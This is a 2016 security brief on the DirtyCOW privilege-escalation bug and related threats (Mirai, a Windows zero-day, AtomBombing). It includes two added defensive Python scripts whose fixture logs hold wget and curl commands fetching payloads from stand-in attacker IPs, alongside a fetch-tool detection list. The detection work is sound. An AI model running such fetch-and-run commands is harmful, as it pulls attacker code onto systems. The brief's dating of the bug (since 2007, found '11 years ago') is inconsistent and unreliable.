Threat Intelligence Brief – November 2016


Privilege Escalation Exploits and DirtyCOW

Privilege escalation (privesc) techniques and exploits are used by threat actors to grant themselves root level permissions in your environment.

How Privesc Techniques Work

Those attempting privesc typically gain initial network access through vulnerable web services. Once in, they’ll use a web shell to maintain their presence on the targeted machine and attempt to elevate their permissions to the root level.


What is DirtyCOW?

Until recently, gaining initial access for a privesc attack was challenging for even the most talented threat actors. However, that’s no longer the case with the release of the Linux zero-day privilege escalation exploit, DirtyCOW.

DirtyCOW is a bug that has been present in the majority of Linux kernels since 2007. There were attempts to fix the issue when it was first discovered 11 years ago; however, these were abandoned because the issue was difficult to recreate consistently.

Unfortunately, the bug is now easily recreated, enabling threat actors to locally exploit a race condition in the copy-on-write (COW) kernel memory subsystem. Worst of all, it’s practically untraceable as it leaves no trace within the logs indicating abnormal activity.

Associated IPs

These IPs have been involved in scanning or attacks relating to web shells possibly used in privesc attacks and should be blocked from your environment. The Armor network has been updated to defend against these threats.

[Image: TIB IP address list]


Due to the direct correlation between the number of file integrity monitoring (FIM) events and the DirtyCOW vulnerability fix, a large number of FIM events (potentially 50K) will be triggered by the kernel file attributes being modified.
Please note this is not an indication of a security concern.
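The note above means a FIM console will fill with kernel-file events during the patch window. The following triage script is an added example, not part of the Armor brief or any FIM product: it separates events that a kernel package update is expected to produce (kernel paths, inside the maintenance window) from everything else, so that an unexpected change to a kernel file outside the window, or to a non-kernel file during it, is not lost in the noise. The path prefixes, the maintenance window and the FIM events are all constructed assumptions.

```python
"""Added example (not from the brief): triage FIM events after a kernel update."""
from datetime import datetime
from typing import Dict, List, Tuple

# Assumption: paths a kernel package update is expected to touch on common distros.
KERNEL_PATH_PREFIXES = ("/boot/", "/lib/modules/", "/usr/lib/modules/")

# Constructed maintenance window during which the kernel patch was applied.
WINDOW_START = datetime(2016, 11, 10, 1, 55)
WINDOW_END = datetime(2016, 11, 10, 2, 10)

# Constructed FIM events: (ISO timestamp, path, change type). The kernel
# version string is a placeholder, not a real package version.
FIM_EVENTS = [
    ("2016-11-10T02:00:05", "/boot/vmlinuz-4.4.0-example", "created"),
    ("2016-11-10T02:00:06", "/lib/modules/4.4.0-example/kernel/fs/ext4/ext4.ko", "attributes"),
    ("2016-11-10T02:00:07", "/lib/modules/4.4.0-example/kernel/net/ipv4/tcp.ko", "attributes"),
    ("2016-11-10T02:03:00", "/etc/ssh/sshd_config", "modified"),
    ("2016-11-10T14:22:10", "/boot/vmlinuz-4.4.0-example", "modified"),
    ("2016-11-10T14:25:00", "/var/www/html/upload.php", "created"),
]


def is_kernel_path(path: str) -> bool:
    """True if the path is one a kernel package update is expected to change."""
    return path.startswith(KERNEL_PATH_PREFIXES)


def triage(events: List[Tuple[str, str, str]],
           start: datetime, end: datetime) -> Tuple[List[Dict], List[Dict]]:
    """Split events into (expected, review).

    expected: kernel-path changes inside the patch window (package churn).
    review:   everything else, each with a reason string for the analyst.
    """
    expected: List[Dict] = []
    review: List[Dict] = []
    for ts_str, path, change in events:
        ts = datetime.fromisoformat(ts_str)
        in_window = start <= ts <= end
        kernel = is_kernel_path(path)
        record = {"ts": ts_str, "path": path, "change": change}
        if kernel and in_window:
            expected.append(record)
        elif kernel:
            # A kernel file changing outside the window is the case to look at first.
            review.append({**record, "reason": "kernel path changed outside patch window"})
        else:
            # Non-kernel files are not explained by the update regardless of timing.
            review.append({**record, "reason": "non-kernel path"})
    return expected, review


def summary(events: List[Tuple[str, str, str]],
            start: datetime, end: datetime) -> Dict[str, int]:
    """Counts an analyst can put on a dashboard: expected churn vs. items to review."""
    expected, review = triage(events, start, end)
    return {"expected": len(expected), "review": len(review)}


if __name__ == "__main__":
    exp, rev = triage(FIM_EVENTS, WINDOW_START, WINDOW_END)
    print(f"{len(exp)} events attributed to the kernel update")
    for r in rev:
        print(f"REVIEW {r['ts']} {r['change']:<10} {r['path']}  ({r['reason']})")
```

In a real deployment the window would come from the package manager log or the change ticket rather than a hard-coded constant, and the prefix list should be checked against what the distribution's kernel package actually installs; the point is that suppressing the 50K-event burst by time and path is safer than silencing FIM for the whole host.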

Mitigating These Threats

Privilege Escalation

The majority of privesc exploits prey on unpatched operating systems and software. Ensuring your system has the latest patch is critical to alleviating these vulnerabilities. After initial disclosure of a new exploit, there’s typically a surge of activity by threat actors seeking to capitalize on it. Fortunately, even if an exploit is released without corresponding patches there are steps you can take to minimize the chance that initial access to your environment takes place:

  • Patch vulnerable operating systems, software and firmware – Apply patch or firmware updates as soon as they’re available. This applies to your entire environment, not just web-facing servers. Patching reduces the likelihood of an attacker compromising a vulnerable web service or an application on a host workstation.
  • Scrutinize outbound traffic – Look for outbound traffic reaching out to known bad IPs. After initial access, threat actors will perform a wget command to pull additional files for exploitation. This may also be an attempt to connect with a command and control server for post-exploitation instructions.
  • Adhere to least privilege – All users and applications within your environment should operate on the least amount of privilege required to function. Running applications with elevated permissions increases the chance that a programming error might allow an attacker to use elevated application permissions to conduct unintended tasks or facilitate privesc attacks.
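The "scrutinize outbound traffic" step above is the one most easily turned into a check. The script below is an added example and not part of the Armor brief: it runs two detections over constructed log lines, flagging outbound connections whose destination is on a blocklist (standing in for the brief's "known bad IPs", which are not reproduced here) and flagging launches of file-fetch tools such as wget, which the brief notes threat actors use to pull additional files after initial access. The log formats are simplified iptables LOG and auditd EXECVE lines, the blocklist uses documentation-range addresses, and all of it is constructed.

```python
"""Added example (not from the brief): outbound blocklist and fetch-tool detection."""
import ipaddress
import re
from typing import Dict, List

# Constructed blocklist: documentation-range addresses (RFC 5737) stand in for
# the brief's "known bad IPs"; a CIDR block shows range matching too.
BLOCKLIST = {"203.0.113.7", "198.51.100.42"}
BLOCKED_NETS = [ipaddress.ip_network("192.0.2.0/24")]

# Constructed, abbreviated iptables LOG lines for outbound connections.
FIREWALL_LOG = """\
Nov 10 09:12:01 web01 kernel: OUT=eth0 SRC=10.0.0.5 DST=93.184.216.34 PROTO=TCP SPT=51012 DPT=443
Nov 10 09:12:07 web01 kernel: OUT=eth0 SRC=10.0.0.5 DST=203.0.113.7 PROTO=TCP SPT=51020 DPT=80
Nov 10 09:12:09 web01 kernel: OUT=eth0 SRC=10.0.0.5 DST=192.0.2.200 PROTO=TCP SPT=51021 DPT=8080
"""

# Constructed, simplified auditd EXECVE records for process launches.
AUDIT_LOG = """\
type=EXECVE msg=audit(1478769127.100:400): argc=2 a0="wget" a1="http://203.0.113.7/x.sh"
type=EXECVE msg=audit(1478769130.200:401): argc=3 a0="ls" a1="-la" a2="/var/www"
type=EXECVE msg=audit(1478769135.300:402): argc=3 a0="curl" a1="-O" a2="http://198.51.100.42/p"
"""

FW_RE = re.compile(r"OUT=\S+ SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*DPT=(?P<dpt>\d+)")
CMD_RE = re.compile(r'a0="(?P<cmd>[^"]+)"')
ARG_RE = re.compile(r'a\d+="([^"]+)"')
FETCH_TOOLS = {"wget", "curl"}  # assumption: the fetch tools worth alerting on


def is_blocked(ip: str) -> bool:
    """True if ip is an exact blocklist entry or falls inside a blocked network."""
    if ip in BLOCKLIST:
        return True
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_NETS)


def flag_outbound(log: str) -> List[Dict[str, str]]:
    """Return outbound connections from firewall log lines whose DST is blocked."""
    hits = []
    for line in log.splitlines():
        m = FW_RE.search(line)
        if m and is_blocked(m.group("dst")):
            hits.append({"src": m.group("src"), "dst": m.group("dst"), "dpt": m.group("dpt")})
    return hits


def flag_fetch_tools(log: str) -> List[Dict[str, str]]:
    """Return EXECVE records that launched a fetch tool, with the URL it was given."""
    hits = []
    for line in log.splitlines():
        m = CMD_RE.search(line)
        if not m or m.group("cmd") not in FETCH_TOOLS:
            continue
        args = ARG_RE.findall(line)
        url = next((a for a in args if a.startswith("http")), "")
        hits.append({"cmd": m.group("cmd"), "url": url})
    return hits


if __name__ == "__main__":
    for h in flag_outbound(FIREWALL_LOG):
        print(f"BLOCKED DST {h['src']} -> {h['dst']}:{h['dpt']}")
    for h in flag_fetch_tools(AUDIT_LOG):
        print(f"FETCH TOOL {h['cmd']} {h['url']}")
```

Both detections are deliberately narrow: the blocklist match catches the case the brief describes, and the fetch-tool match catches the wget stage even when the destination is not yet on a list. A web server's service account normally has no reason to run wget or curl at all, so restricting that account to least privilege (the third bullet above) turns this alert into something close to a hard block.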

Applying updated patches is the only way to remove this security vulnerability. CentOS, Red Hat, Debian and Ubuntu have released patches, with other distros to roll out theirs soon. Since some older versions of Linux distros may not be patched, we highly advise that you upgrade to a newer version of the Linux OS.

It’s important to note this bug isn’t an exploit in itself and doesn’t grant threat actors remote access. However, once they have remote access, it allows them to use a wide array of remote exploits and web shells to gain root permissions in targeted machines that normally restrict user level access. This is why patching is so critical to network security. If they can’t gain an initial foothold in your environment, then they can’t privesc.



Someone has released the source code for the Mirai botnet responsible for the DDoS against Krebs. This development has the potential to open the floodgates for future attacks. Krebs on Security suffered the wrath of the first Mirai DDoS attack, but it was the attack against Dyn DNS that had the internet reeling. While the threat is daunting, the solution isn’t: access to these devices isn’t persistent and doesn’t survive a reboot. Simple as that is, with the world scrambling to make sense of this new attack vector, it’s unclear who will control the millions of devices out there with vulnerable configurations and weak default passwords. We hope that users of IoT devices will heed the warning signs, change the credentials from the defaults and apply firmware updates to these devices.



Not to be outdone by vulnerable Linux-based devices, Windows is back in the news for a zero-day privesc exploit. Google notified Microsoft that they had discovered a vulnerability on October 21. Google has a policy of reporting actively exploited vulnerabilities: they give the affected company a week to release an update before going public with the news, which Google did as Microsoft has yet to release a patch for this vulnerability. Microsoft did, however, respond that the exploit is currently being used by the same Russian state actors behind the DNC hack. By combining this Microsoft vulnerability with an Adobe Flash zero-day exploit, threat actors can escape the application sandbox and elevate privilege within the targeted network. A security patch for Adobe Flash was released on October 26, and a patch for all versions of Windows is in the works.



AtomBombing, a newly released code injection technique, was named for its ability to compromise every version of the Windows operating system regardless of malware protection. This technique attacks system level Atom tables, which are used by Windows applications to store information on different types of data. The malicious code modifies these tables and causes legitimate applications to execute malicious actions, bypassing process level restrictions. Unfortunately, this is a design flaw in the operating system and not easily patched out. Microsoft suggests that users maintain a heightened security posture such as exercising caution when clicking on links, opening unknown files or accepting file transfers. The system must already be compromised for this code injection technique to work.
